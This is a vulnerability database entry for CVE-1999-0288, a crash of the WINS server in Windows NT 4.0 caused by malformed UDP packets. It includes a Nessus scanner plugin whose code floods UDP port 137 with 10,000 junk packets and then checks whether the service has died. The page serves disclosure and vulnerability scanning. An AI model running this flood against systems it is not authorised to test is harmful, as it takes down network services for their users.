Vulnerabilities > CVE-1999-0288 - Unspecified vulnerability in Microsoft Windows NT 4.0

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
microsoft
nessus
exploit available
NVD
Published: 1998-08-01
Updated: 2024-11-20

Summary

The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets.

Vulnerable Configurations

Part Description Count
OS
Microsoft
4

Exploit-Db

descriptionMicrosoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability. CVE-1999-0288. Dos exploit for windows platform
idEDB-ID:19238
last seen2016-02-02
modified1999-06-04
published1999-06-04
reporterCarl Byington
sourcehttps://www.exploit-db.com/download/19238/
titleMicrosoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - DoS Duplicate Hostname Vulnerability

Nessus

NASL familyWindows
NASL idWINS_UDP_FLOOD.NASL
descriptionWe could crash the remote WINS server by sending it a lot of UDP packets containing random data. If you do not use WINS, then deactivate this server. An attacker may use this flaw to bring down your NT network.
last seen2020-06-01
modified2020-06-02
plugin id10315
published1999-08-30
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10315
titleMicrosoft Windows NT WINS Service Malformed Data DoS
code
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if(description)
{
  script_id(10315);
  script_version ("1.26");
  script_cve_id("CVE-1999-0288");
  script_bugtraq_id(298);

  script_name(english:"Microsoft Windows NT WINS Service Malformed Data DoS");
  script_summary(english:"Crashes the remote WINS server");

   script_set_attribute(
    attribute:'synopsis',
    value:'The remote service is vulnerable to denial of service.'
  );

  script_set_attribute(
    attribute:'description',
    value:"We could crash the remote WINS server by sending it a lot of UDP packets containing
random data.

If you do not use WINS, then deactivate this server.

An attacker may use this flaw to bring down your NT network."
  );

  script_set_attribute(
    attribute:'solution',
    value:"Upgrade Windows NT to SP5 or later."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(
    attribute:'see_also',
    value:'https://www.safenetworks.com'
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "1999/08/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "1999/06/04");
 script_cvs_date("Date: 2018/11/15 20:50:29");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DENIAL);	# ACT_FLOOD?
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
  script_family(english:"Windows");
  script_require_ports(137);
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");

if (! get_port_state(137)) exit(0, "TCP port 137 is closed.");
if (! get_udp_port_state(137)) exit(0, "UDP port 137 is closed.");

soc = open_sock_tcp(137);
if (! soc) exit(1);

  close(soc);
  udp_soc = open_sock_udp(137);
  crp = crap(1000);

  for(j=0;j<10000;j=j+1)
  {
   send(socket:udp_soc, data:crp);
  }

  close(udp_soc);

if (service_is_dead(port: 137) > 0)
  security_warning(137);

References